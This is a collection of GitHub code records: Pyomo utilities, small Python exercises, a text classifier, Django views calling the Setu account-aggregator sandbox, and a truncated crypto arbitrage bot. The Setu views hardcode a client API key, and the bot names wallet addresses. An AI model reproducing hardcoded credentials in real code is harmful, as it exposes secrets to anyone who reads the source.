variables.\"\n % (int_var.name, int_var.lb, int_var.ub))\n if int_var.lb < 0:\n raise ValueError(\n \"Integer variable %s can be negative. \"\n \"GDPopt currently only supports positive integer \"\n \"variables.\" % (int_var.name)\n )\n # do the reformulation\n highest_power = floor(log(value(int_var.ub), 2))\n var_name = int_var.name\n reform_block.integer_to_binary_constraint.add(\n var_name, expr=int_var == sum(\n reform_block.new_binary_var[var_name, pwr] * (2 ** pwr)\n for pwr in range(0, int(highest_power) + 1)))\n int_var.domain = NonNegativeReals\n\n config.logger.info(\n \"Reformulated %s integer variables using \"\n \"%s binary variables and %s constraints.\"\n % (len(integer_vars), len(reform_block.new_binary_var),\n len(reform_block.integer_to_binary_constraint)))\n\n\ndef validate_disjunctions(model, config):\n \"\"\"Validate that the active disjunctions on the model are satisfied\n by the current disjunct indicator_var values.\"\"\"\n active_disjunctions = model.component_data_objects(\n ctype=Disjunction, active=True, descend_into=(Block, Disjunct))\n for disjtn in active_disjunctions:\n sum_disj_vals = sum(disj.indicator_var.value\n for disj in disjtn.disjuncts)\n if disjtn.xor and fabs(sum_disj_vals - 1) > config.integer_tolerance:\n raise ValueError(\n \"Expected disjunct values to add up to 1 \"\n \"for XOR disjunction %s. \"\n \"Instead, values add up to %s.\" % (disjtn.name, sum_disj_vals))\n elif sum_disj_vals + config.integer_tolerance < 1:\n raise ValueError(\n \"Expected disjunct values to add up to at least 1 for \"\n \"OR disjunction %s. \"\n \"Instead, values add up to %s.\" % (disjtn.name, sum_disj_vals))\n\n\ndef algorithm_is_making_progress(solve_data, config):\n \"\"\"Make sure that the algorithm is making sufficient progress\n at each iteration to continue.\"\"\"\n\n # TODO if backtracking is turned on, and algorithm visits the same point\n # twice without improvement in objective value, turn off backtracking.\n\n # TODO stop iterations if feasible solutions not progressing for a number\n # of iterations.\n\n # If the hybrid algorithm is not making progress, switch to OA.\n # required_feas_prog = 1E-6\n # if solve_data.working_model.GDPopt_utils.objective.sense == minimize:\n # sign_adjust = 1\n # else:\n # sign_adjust = -1\n\n # Maximum number of iterations in which feasible bound does not\n # improve before terminating algorithm\n # if (len(feas_prog_log) > config.algorithm_stall_after and\n # (sign_adjust * (feas_prog_log[-1] + required_feas_prog)\n # >= sign_adjust *\n # feas_prog_log[-1 - config.algorithm_stall_after])):\n # config.logger.info(\n # 'Feasible solutions not making enough progress '\n # 'for %s iterations. Algorithm stalled. Exiting.\\n'\n # 'To continue, increase value of parameter '\n # 'algorithm_stall_after.'\n # % (config.algorithm_stall_after,))\n # return False\n\n return True\n\n\ndef algorithm_should_terminate(solve_data, config):\n \"\"\"Check if the algorithm should terminate.\n\n Termination conditions based on solver options and progress.\n\n \"\"\"\n # Check bound convergence\n if solve_data.LB + config.bound_tolerance >= solve_data.UB:\n config.logger.info(\n 'GDPopt exiting on bound convergence. '\n 'LB: %s + (tol %s) >= UB: %s' %\n (solve_data.LB, config.bound_tolerance,\n solve_data.UB))\n return True\n\n # Check iteration limit\n if solve_data.master_iteration >= config.iterlim:\n config.logger.info(\n 'GDPopt unable to converge bounds '\n 'after %s master iterations.'\n % (solve_data.master_iteration,))\n config.logger.info(\n 'Final bound values: LB: %s UB: %s'\n % (solve_data.LB, solve_data.UB))\n return True\n\n if not algorithm_is_making_progress(solve_data, config):\n config.logger.debug(\n 'Algorithm is not making enough progress. '\n 'Exiting iteration loop.')\n return True\n return False\n\n\ndef copy_and_fix_mip_values_to_nlp(var_list, val_list, config):\n \"\"\"Copy MIP solution values to the corresponding NLP variable list.\n\n Fix binary variables and optionally round their values.\n\n \"\"\"\n for var, val in zip(var_list, val_list):\n if val is None:\n continue\n if not var.is_binary():\n var.value = val\n elif ((fabs(val) > config.integer_tolerance and\n fabs(val - 1) > config.integer_tolerance)):\n raise ValueError(\n \"Binary variable %s value %s is not \"\n \"within tolerance %s of 0 or 1.\" %\n (var.name, var.value, config.integer_tolerance))\n else:\n # variable is binary and within tolerances\n if config.round_NLP_binaries:\n var.fix(int(round(val)))\n else:\n var.fix(val)\n","repo_name":"rowhit/pyomo","sub_path":"pyomo/contrib/gdpopt/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":19207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"14744232404","text":"# Game, Set, Match\n\n\nimport csv\n\n\ndef main():\n # Read the CSV file\n data = read_csv_file(\"wimbledon.csv\")\n\n # Get the champions and the number of times they have won\n champions = get_champions(data)\n\n # Display the champions and the number of times they have won\n print(\"Wimbledon Champions:\")\n for name, count in champions.items():\n print(f\"{name} {count}\")\n\n # Get the countries of the champions\n countries = get_countries(data)\n\n # Display the countries of the champions in alphabetical order\n print(\"\\nThese\", len(countries), \"countries have won Wimbledon:\")\n print(\", \".join(sorted(countries)))\n\n\ndef read_csv_file(filename):\n \"\"\"\n Reads a CSV file and returns its contents as a list of lists.\n \"\"\"\n with open(filename, \"r\", encoding=\"utf-8-sig\") as in_file:\n reader = csv.reader(in_file)\n return [row for row in reader]\n\n\ndef get_champions(data):\n \"\"\"\n Returns a dictionary containing the champions and the number of times they have won.\n \"\"\"\n champions = {}\n for row in data:\n if row[0] != \"Year\": # Skip the header row\n name = row[2]\n champions[name] = champions.get(name, 0) + 1\n return champions\n\n\ndef get_countries(data):\n \"\"\"\n Returns a set of the countries of the champions.\n \"\"\"\n countries = set()\n for row in data:\n if row[0] != \"Year\": # Skip the header row\n country = row[1]\n countries.add(country)\n return countries\n\n\nmain()\n","repo_name":"tamil290/CP1404","sub_path":"Practical_5/wimbledon.py","file_name":"wimbledon.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4246647109","text":"\n \n\n# create a random dictionary of words and their definitions\nimport profile\n\n\nports_protocols = {\n \"21\": \"FTP\",\n \"22\": \"SSH\",\n \"23\": \"TELNET\",\n \"25\": \"SMTP\",\n \"53\": \"DNS\",\n \"80\": \"HTTP\",\n \"443\": \"HTTPS\",\n \"3306\": \"MYSQL\",\n \"5432\": \"POSTGRESQL\"}\n\nfrom memory_profiler import profile\nimport timeit\n\n@profile(precision=2)\ndef create_dictionary():\n words = ['apple', 'banana', 'orange', 'coconut', 'strawberry', 'lime', 'grapefruit', 'lemon', 'kumquat', 'blueberry', 'melon']\n dictionary = {}\n for word in words:\n definition = word + \" is a fruit.\"\n dictionary[word] = definition\n return dictionary # return the dictionary\n\n\nprint(timeit.timeit(\"create_dictionary()\", setup=\"from __main__ import create_dictionary\",number=1))\n\n# for x in dict1:\n# print(x, dict1[x])","repo_name":"maxacode/Technical-Interview-Prep-Sites","sub_path":"Individual Functions Practice/memory_profiler.py","file_name":"memory_profiler.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1148001315","text":"batch_size = 128\nalpha_channels = 3\nwidth = 16\nheight = 16\n\nfilter_height = 5\nfilter_width = filter_height\nconvolutional_channels = 6\nconvolutional_skip = 2\npool_skip = 2\n# from get_bottleneck_data import TOP_CLASSES\n# len(TOP_CLASSES)\nnum_targets = 1623 + 1\nlearning_rate = 0.01\nnum_steps = 5000\n\nnum_bottlenecks = 1001\n","repo_name":"joshbrowning2358/cDiscount","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3937079214","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 19 15:07:16 2018\n\n@author: dadangewp\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nfrom dataReader import parse_training\nfrom dataReader import parse_testing\nimport configFeature as cfgFeature\nimport featureManager\nfrom sklearn import svm\nfrom sklearn import tree\nfrom sklearn import metrics\nfrom sklearn.metrics.scorer import make_scorer\nfrom sklearn.metrics import f1_score, classification_report, accuracy_score, make_scorer\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\n\n\n\nDIR_TRAIN = \"D:\\\\PhD\\\\Misogyny Detection\\\\Evalita\\\\en_training_taskb.tsv\"\nDIR_TEST = \"D:\\\\PhD\\\\Misogyny Detection\\\\Evalita\\\\en_testing_taskb_linear.tsv\"\n\noriginalclass = []\npredictedclass = []\n\ndef classification_report_with_accuracy_score(y_true, y_pred):\n #print (classification_report(y_true, y_pred)) # print classification report\n originalclass.extend(y_true)\n predictedclass.extend(y_pred)\n return accuracy_score(y_true, y_pred) # return accuracy score\n\nif __name__ == '__main__':\n \n print (\"started ...\")\n TASK = \"B-English\" # Define, A or B\n FNAME = './predictions-task' + TASK + '.txt'\n PREDICTIONSFILE = open(FNAME, \"w\")\n # read Training data\n #print (\"load wordvector\")\n #word2vec = gensim.models.KeyedVectors.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True)\n #word2vec = dict(zip(model.wv.index2word, model.wv.syn0))\n #print (\"wordvector load finished\")\n word2vec = \"zonk\"\n feature_manager=featureManager.make_feature_manager()\n dataTrain, dataLabel = parse_training(DIR_TRAIN)\n dataTest = parse_testing(DIR_TEST)\n print (\"Training data read\") \n feature_names=cfgFeature.feature_list['feature_names']\n #stuff = range(0, len(feature_names) )\n #parameters=[]\n #parameters_optimized=[]\n #highest=0\n #max_feature_set=[]\n #for L in range(1, len(stuff)+1):\n #for subset in combinations(stuff, L):\n #X_train,X_test=feature_manager.create_feature_space(dataTrain, word2vec, feature_names[list(subset)], train_tweets=None)\n #clf = svm.LinearSVC()\n #print (\"training start\")\n #clf.fit(X_train, dataLabel)\n #print (\"training done\")\n #scores = cross_val_score(clf, X_train, dataLabel, cv=10) \n #acc = scores.mean()\n #predicted = cross_val_predict(clf,X_train,dataLabel,cv=10)\n #score = metrics.f1_score(dataLabel, predicted, pos_label=1)\n #print(feature_names[list(subset)])\n #print(score)\n #if score > 0.65:\n #print(str(feature_names[list(subset)]))\n #PREDICTIONSFILE.write(str(feature_names[list(subset)])+\";\")\n #print(score)\n #PREDICTIONSFILE.write(str(score))\n #PREDICTIONSFILE.write(\"\\n\")\n X_train, X_test = feature_manager.create_feature_space(dataTrain, dataTest, feature_names)\n #print (X_train.shape)\n #print (X_test.shape)\n clf = svm.LinearSVC()\n clf.fit(X_train,dataLabel)\n \n #print(cross_val_score(clf, X_train, dataLabel, cv=10, scoring=\"accuracy\"))\n scores = cross_val_score(clf, X_train, dataLabel, cv=10, scoring=make_scorer(f1_score, average='macro'))\n print(scores)\n print(\"Accuracy (Cross-V): %0.3f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n #nested_score = cross_val_score(clf, X=X_train, y=dataLabel, cv=10, \\\n # scoring=make_scorer(classification_report_with_accuracy_score))\n #print(classification_report(originalclass, predictedclass, digits=3))\n #predicted = cross_val_predict(clf,X_train,dataLabel,cv=10)\n predicted = clf.predict(X_test)\n #score = metrics.f1_score(labelTest, predicted, pos_label=1)\n #scoreTrain = metrics.f1_score(dataLabel, predictedTrain, pos_label=1)\n #print (\"F1-score Task\", TASK, score)\n #print (scoreTrain)\n for p in predicted:\n PREDICTIONSFILE.write(\"{}\\n\".format(p))\n PREDICTIONSFILE.close()\n ","repo_name":"dadangewp/misogyny-project","sub_path":"IberEval_Misogyny-Detection-LinearSVC/misogyny_TaskA.py","file_name":"misogyny_TaskA.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18523130874","text":"from django.shortcuts import render, redirect\nfrom .forms import RegisterForm, LoginForm\nfrom django.contrib.auth import login\nfrom django.contrib.auth import logout\n\n\ndef user_login(request):\n if request.method == \"POST\":\n form = LoginForm(data=request.POST)\n if form.is_valid():\n login(request, form.user_cache)\n return redirect(\"blog:index\")\n else:\n form = LoginForm()\n return render(request, \"login_and_register/login.html\", {\"form\": form})\n\n\ndef user_register(request):\n if request.method == \"POST\":\n form = RegisterForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"login_and_register:login\")\n\n # form.save()\n else:\n form = RegisterForm()\n\n return render(request, \"login_and_register/register.html\", {\"form\": form})\n\n\ndef user_logout(request):\n logout(request)\n return redirect(\"blog:index\")\n\n","repo_name":"radgra/django_blog","sub_path":"login_and_register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21129810900","text":"arr = [1, 2, 3]\n\nN = 3#len arr\n\n#사용한 결과물을 담는 데이터\nsel = [0] * N#결과들이 저장될 리스트\ncheck = [0] * N#해당 원소를 이미 사용했는지 안 했는지에 대한 체크\n\ndef comb(idx):\n if idx == N:\n print(sel)\n return\n for i in range(idx, N):\n if not check[i]:\n check[i] = True\n sel[i] = arr[i]\n comb(i+1)\ncomb(0)\n","repo_name":"Gyujeong-Lee/Algorithm_study","sub_path":"0419/comb.py","file_name":"comb.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33924653329","text":"import json\nfrom django.shortcuts import render\nfrom requests.api import request\nfrom rest_framework import serializers\nfrom rest_framework.response import Response\nimport codecs\nimport requests\nimport jwt\nimport uuid\nfrom datetime import datetime\nimport time\nfrom django.views import View\nfrom rest_framework.serializers import Serializer\nfrom rest_framework.views import APIView\nimport requests\nimport logging\nimport base64\nfrom http.client import HTTPConnection # py3\nfrom .serializer import UserSerializer, TransactionSerializer, GoalSerializer\nfrom .models import User, Transaction, Goal\nfrom rest_framework.generics import CreateAPIView, ListAPIView, ListCreateAPIView, UpdateAPIView, DestroyAPIView, RetrieveUpdateAPIView\n\n\nclass createConsent(APIView):\n\n def post(self, request):\n mobileNumber = request.data.get(\"mobile\")\n body = createData(mobileNumber)\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, body)\n url = \"https://aa-sandbox.setu.co/Consent\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.post(url, headers=headers, json=body)\n response = response.json()\n resUrl = \"https://anumati.setu.co/\" + response[\"ConsentHandle\"] + \\\n \"?redirect_url=http://484c-103-250-137-194.ngrok.io/redirect/\"\n return Response(resUrl)\n\n\nclass consentNotification(APIView):\n def post(self, request):\n consentId = request.data.get(\n \"ConsentStatusNotification\").get(\"consentId\")\n consentStatus = request.data.get(\n \"ConsentStatusNotification\").get(\"consentStatus\")\n if consentStatus == \"ACTIVE\":\n fetchSignedConsent(consentId)\n dateNow = datetime\n res = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"response\": \"OK\",\n }\n return Response(res)\n\n\ndef createData(mobileNumber):\n dateNow = datetime\n expiry = time.time()\n data = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"ConsentDetail\": {\n \"consentStart\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"consentExpiry\": \"2021-12-03T14:25:33.440Z\",\n \"consentMode\": \"VIEW\",\n \"fetchType\": \"ONETIME\",\n \"consentTypes\": [\"TRANSACTIONS\", \"PROFILE\", \"SUMMARY\"],\n \"fiTypes\": [\"DEPOSIT\", \"MUTUAL_FUNDS\"],\n \"DataConsumer\": {\"id\": \"1fbad2f2-ce8c-4127-b24b-df360f57b06c\"},\n \"Customer\": {\"id\": mobileNumber + \"@setu-aa\"},\n \"Purpose\": {\n \"code\": \"101\",\n \"refUri\": \"https://api.rebit.org.in/aa/purpose/101.xml\",\n \"text\": \"Wealth management service\",\n \"Category\": {\"type\": \"string\"},\n },\n \"FIDataRange\": {\n \"from\": \"2021-1-06T11:39:57.153Z\",\n \"to\": \"2021-06-30T14:25:33.440Z\",\n },\n \"DataLife\": {\"unit\": \"MONTH\", \"value\": 0},\n \"Frequency\": {\"unit\": \"MONTH\", \"value\": 100},\n \"DataFilter\": [\n {\n \"type\": \"TRANSACTIONAMOUNT\",\n \"operator\": \">=\",\n \"value\": \"0\",\n },\n ],\n },\n }\n return data\n\n\ndef makeDetachedJWS(privateKey, body):\n\n encoded = jwt.encode(body, privateKey, algorithm=\"RS256\")\n encoded = encoded.split(\".\")\n encoded[1] = \"\"\n return \".\".join(encoded)\n\n\ndef fetchSignedConsent(consentId):\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, {\"Consent\": consentId})\n url = \"https://aa-sandbox.setu.co/Consent/\" + consentId\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.get(url, headers=headers)\n response = response.json()\n fiDataRequest(response[\"signedConsent\"], consentId)\n\n\ndef fiDataRequest(signedConsent, consentId):\n keys = generateKeyMaterial()\n requestBody = requestDataBody(\n signedConsent, consentId, keys[\"KeyMaterial\"])\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, requestBody)\n url = \"https://aa-sandbox.setu.co/FI/request\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n data = requestBody\n response = requests.post(url, headers=headers, json=data)\n response = response.json()\n fiDataFetch(response[\"sessionId\"],\n keys[\"privateKey\"], keys[\"KeyMaterial\"])\n\n\ndef generateKeyMaterial():\n url = \"https://rahasya.setu.co/ecc/v1/generateKey\"\n response = requests.get(url)\n response = response.json()\n return response\n\n\ndef requestDataBody(signedConsent, consent_id, keys):\n dateNow = datetime\n data = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"FIDataRange\": {\n \"from\": \"2021-1-06T11:39:57.153Z\",\n \"to\": \"2021-06-30T14:25:33.440Z\",\n },\n\n \"Consent\": {\n \"id\": consent_id,\n \"digitalSignature\": signedConsent.split(\".\")[2],\n },\n \"KeyMaterial\": keys,\n }\n return data\n\n\ndef fiDataFetch(session_id, encryption_privateKey, keyMaterial):\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, {\"a\": \"b\"})\n url = \"https://aa-sandbox.setu.co/FI/fetch/\" + session_id\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.get(url, headers=headers)\n response = response.json()\n decryptData(response[\"FI\"], encryption_privateKey, keyMaterial)\n\n\ndef decryptData(fi, privateKey, keyMaterial):\n fi_data = fi[0]\n body = {\n \"base64Data\": fi_data[\"data\"][0][\"encryptedFI\"],\n \"base64RemoteNonce\": fi_data[\"KeyMaterial\"][\"Nonce\"],\n \"base64YourNonce\": keyMaterial[\"Nonce\"],\n \"ourPrivateKey\": privateKey,\n \"remoteKeyMaterial\": fi_data[\"KeyMaterial\"],\n }\n url = \"https://rahasya.setu.co/ecc/v1/decrypt\"\n data = body\n response = requests.post(url, json=data)\n response = response.json()\n base64Data = response[\"base64Data\"]\n b64_str = base64Data.encode('ascii')\n b64_bytes = base64.b64decode(b64_str)\n data = b64_bytes.decode('ascii')\n data = json.loads(data)\n\n print(\"LALALALlalalallALLA\")\n print(data)\n\n if User.objects.filter(accountNumber = data[\"account\"][\"maskedAccNumber\"]).exists():\n ###Update User###\n user = User.objects.get(accountNumber = data[\"account\"][\"maskedAccNumber\"])\n user.userName = data[\"account\"][\"profile\"][\"holders\"][\"holder\"][\"name\"]\n user.balance = data[\"account\"][\"summary\"][\"currentBalance\"]\n user.save()\n else:\n ###Create User###\n accountData = {\n \"accountNumber\": data[\"account\"][\"maskedAccNumber\"],\n \"userName\": data[\"account\"][\"profile\"][\"holders\"][\"holder\"][\"name\"],\n \"balance\": data[\"account\"][\"summary\"][\"currentBalance\"]\n }\n serializer = UserSerializer(data=accountData)\n if serializer.is_valid():\n serializer.save()\n \n for i in data[\"account\"][\"transactions\"][\"transaction\"]:\n \n if Transaction.objects.filter(accountNumber = data[\"account\"][\"maskedAccNumber\"]).exists():\n ###Update Transaction###\n txn = Transaction.objects.get(accountNumber = data[\"account\"][\"maskedAccNumber\"])\n txn.mode = i[\"mode\"]\n txn.type = i[\"type\"]\n txn.txnId = i[\"txnId\"]\n txn.amount = i[\"amount\"]\n txn.narration = i[\"narration\"]\n txn.valueDate = i[\"valueDate\"]\n txn.balance = i[\"currentBalance\"]\n txn.save()\n else:\n ###Create Transaction###\n transactionData = {\n \"accountNumber\": data[\"account\"][\"maskedAccNumber\"],\n \"mode\": i[\"mode\"],\n \"type\": i[\"type\"],\n \"txnId\": i[\"txnId\"],\n \"amount\": i[\"amount\"],\n \"narration\": i[\"narration\"],\n \"valueDate\": i[\"valueDate\"],\n \"balance\": i[\"currentBalance\"]\n }\n serializer = TransactionSerializer(data=transactionData)\n if serializer.is_valid():\n serializer.save()\n\nclass viewTxn(APIView):\n def get(self, request):\n queryset = Transaction.objects.all().values()\n array = []\n for i in queryset:\n if i[\"valueDate\"].split(\"-\")[1] == \"06\" and i[\"type\"] == \"DEBIT\":\n array.append(i)\n return Response(array)\n\n\nclass get1per(APIView):\n\n def get(self, request):\n txn = Transaction.objects.filter(\n valueDate=\"2021-06-08\").values(\"amount\")[0][\"amount\"]\n txn = txn/100\n return Response(txn)\n\n\nclass getGoal(ListAPIView):\n queryset = Goal.objects.all()\n serializer_class = GoalSerializer\n\nclass editGoal(APIView):\n def put(self,request):\n CauseType = request.data.get('causeType')\n DonationItem = request.data.get('donationItem')\n ItemQuantity = request.data.get('itemQuantity')\n ItemPrice = request.data.get('itemPrice')\n if Goal.objects.filter(donationItem = DonationItem).exists():\n ###Update Goal###\n goal = Goal.objects.get(donationItem = DonationItem)\n goal.causeType = CauseType\n goal.itemQuantity = ItemQuantity\n goal.itemPrice = ItemPrice\n goal.save()\n else:\n ###Create Goal###\n goalData = {\n \"causeType\": CauseType,\n \"donationItem\": DonationItem,\n \"itemQuantity\": ItemQuantity,\n \"itemPrice\": ItemPrice,\n }\n serializer = GoalSerializer(data=goalData)\n if serializer.is_valid():\n serializer.save()\n return Response()\n\nclass viewUserData(ListAPIView):\n queryset = User.objects.all()\n serializer_class = UserSerializer","repo_name":"RadhikaSheth/Prthvi","sub_path":"server/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32579607594","text":"#\n# @lc app=leetcode.cn id=790 lang=python3\n#\n# [790] 多米诺和托米诺平铺\n#\n\n# @lc code=start\nclass Solution:\n def numTilings(self, n: int) -> int:\n MOD = 10 ** 9 + 7\n dp = [[0] * 4 for _ in range(n + 1)]\n dp[0][3] = 1\n for i in range(1, n + 1):\n dp[i][0] = dp[i - 1][3]\n dp[i][1] = (dp[i - 1][0] + dp[i - 1][2]) % MOD\n dp[i][2] = (dp[i - 1][0] + dp[i - 1][1]) % MOD\n dp[i][3] = (((dp[i - 1][0] + dp[i - 1][1]) % MOD + dp[i - 1][2]) % MOD + dp[i - 1][3]) % MOD\n return dp[n][3]\n# @lc code=end\n\n","repo_name":"Phil2ng/LeetCode","sub_path":"790.多米诺和托米诺平铺.py","file_name":"790.多米诺和托米诺平铺.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24011971044","text":"class Solution(object):\n def searchInsert(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n \n if len(nums)==0:\n return 0\n else:\n start = 0\n end = len(nums)-1\n mid = (start+end)/2\n # print(start,mid,end)\n while (end-start)>2:\n print(nums[start],nums[mid],nums[end])\n if nums[mid]=target:\n return start\n elif nums[end]list:\n\n xmin,xmax,ymin,ymax,mat=self.mini_img(img)\n img=img[ymin:ymax,xmin:xmax]\n img1=img.copy()\n img1=cv.cvtColor(img,cv.COLOR_BGR2HSV)\n img1[mat!=255]=[0,0,0]\n # B,G,R=cv.split(img1)\n # #hhh=img.copy()\n # R[R!=0]=0\n # G[G!=0]=0\n # hhh=cv.merge([B,G,R])\n if see_make:\n cv.imshow('rrr',mat)\n cv.imshow('ooo',img)\n cv.imshow('ppp',img1)\n #cv.imshow('yyy',hhh)\n #cv.imshow('uuu',mmm)\n cv.waitKey(0) \n cv.destroyAllWindows()\n\n hist1 = cv.calcHist([img1],[0], None, [15], [1.0,255.0])\n #hist2 = cv.calcHist([img1],[1], None, [3], [1.0,255.0])\n hist3 = cv.calcHist([img1],[2], None, [5], [1.0,255.0])\n #print(hist6)\n\n hist1=hist1/np.sum(hist1)\n #hist2=hist2/np.sum(hist2)\n hist3=hist3/np.sum(hist3)\n hist=np.concatenate((hist1,hist3),axis=0)\n return hist,mat,(xmin,xmax,ymin,ymax)\n\ndef init_get_video(classname,video_name,num_of_photo,path,update_data=False):\n flag=0\n try:\n os.mkdir(os.path.join(path,video_name))\n except Exception as Error:\n print(Error)\n flag=1\n for i in classname:\n try:\n length=len(os.listdir(os.path.join(path,video_name,i)))\n except Exception as Error:\n flag=0\n break\n if length.2f}\".format(sum(fps)/len(fps)))\n return acc\n\n KKK=KNNClassifier(video_name,modelpath)\n test_path=os.path.join(modelpath,video_name+'_test')#\"./knn_classes/train_it2/\"\n acc=test(test_path,KKK)\n print(acc)\n\n","repo_name":"chenzhike110/Fast-tracking","sub_path":"ORBmin.py","file_name":"ORBmin.py","file_ext":"py","file_size_in_byte":10605,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"28655868508","text":"# -*- coding: utf-8 -*-\nimport telegram\nimport time\nimport sys\nimport config\nfrom exchage_api.bittrex import bittrex\nfrom exchage_api.poloniex import poloniex\nimport util\n\n# 변수선언\nmarketcurrency = config.markgetcurrency # 기준코인\n#altcurrency = config.altcurrency # 알트코인\naltcurrency = 'DGB' # 알트코인\nspread = 0.8 # 차이 0.8%\nbittrex_market = '{0}-{1}'.format(marketcurrency, altcurrency)\npoloniex_market = '{0}_{1}'.format(marketcurrency, altcurrency)\nis_marketcurrency_transfering = False\nis_altcurrency_transfering = False\nbittrex_api = config.bittrex_api\nbittrex_key = config.bittrex_key\npoloniex_api = config.poloniex_api\npoloniex_key = config.poloniex_key\nbittrex_marketcurrency_bal = 0\npoloniex_marketcurrency_bal = 0\nbittrex_altcurrency_bal = 0\npoloniex_altcurrency_bal = 0\nbittrex_marketcurrency_address = '1DAFcmkeQiMWdhAmwKBLmx9pUpM4yak4DC'\npoloniex_marketcurrency_address = '1J4LrydHhH356J1ykvbXVDsj4a2s2497PP'\nbittrex_altcurrency_address = 'DPCgJ15dvMSTVvSKUX1LU1s4RZs5Dk2T8H'\npoloniex_altcurrency_address = 'DBCLd1NZpKFjc8eo2RgyWL43a6zBkCqTLP'\ntelegram_token = config.telegram_token\ntelegram_chat_id = config.telegram_chat_id\nspread = 0.8 # %\nspread = spread / 100\nbot = telegram.Bot(token=telegram_token)\n# API 객채생성\nbitt = bittrex(bittrex_api, bittrex_key)\npolo = poloniex(poloniex_api, poloniex_key)\n\n\ndef send_message(msg=None):\n print(msg)\n #bot.sendMessage(chat_id=telegram_chat_id, text=msg)\n\n\ndef send_message_with_error(message=None):\n msg = f\"⚠️ Error - wait 10 min\\n{0}\".format(message)\n print(msg)\n bot.sendMessage(chat_id=telegram_chat_id, text=msg)\n\n\n# 잔고조정\ndef balancing():\n global bittrex_marketcurrency_bal\n global poloniex_marketcurrency_bal\n global bittrex_altcurrency_bal\n global poloniex_altcurrency_bal\n global is_marketcurrency_transfering\n global is_altcurrency_transfering\n\n # 이체 중 인지 판단\n # 송금하면 송금플래그를 true 로변경\n # 송금전의 잔액 기억하고 있다가 송금한 금액만큼(수수료 감안) 증가하면 이체완료로 간주한다\n\n is_marketcurrency_transfering = False\n if not is_marketcurrency_transfering:\n # Market Currency 잔고 조회\n try:\n bittrex_marketcurrency_bal = float(bitt.getbalance(marketcurrency)['Available'])\n except:\n print('bittrex get balance error-{0}'.format(bitt.getbalance(marketcurrency)['Available']))\n bittrex_marketcurrency_bal = 0\n try:\n poloniex_marketcurrency_bal = float(polo.returnBalances()[marketcurrency])\n except:\n print('poloniex get balance error-{0}'.format(polo.returnBalances()[marketcurrency]))\n poloniex_marketcurrency_bal = 0\n total_marketcurrency_bal = bittrex_marketcurrency_bal + poloniex_marketcurrency_bal\n print('bittrex : {0:8f}{1} / poloniex : {2:8f}{3}'.format(bittrex_marketcurrency_bal, marketcurrency, poloniex_marketcurrency_bal, marketcurrency))\n\n # Market Currency 잔고 조정\n if bittrex_marketcurrency_bal / total_marketcurrency_bal > 0.8:\n try:\n transfer_amount = bittrex_marketcurrency_bal - (total_marketcurrency_bal / 2)\n #bitt.withdraw(marketcurrency, transfer_amount, poloniex_marketcurrency_address)\n send_message('withdraw to Poloniex : 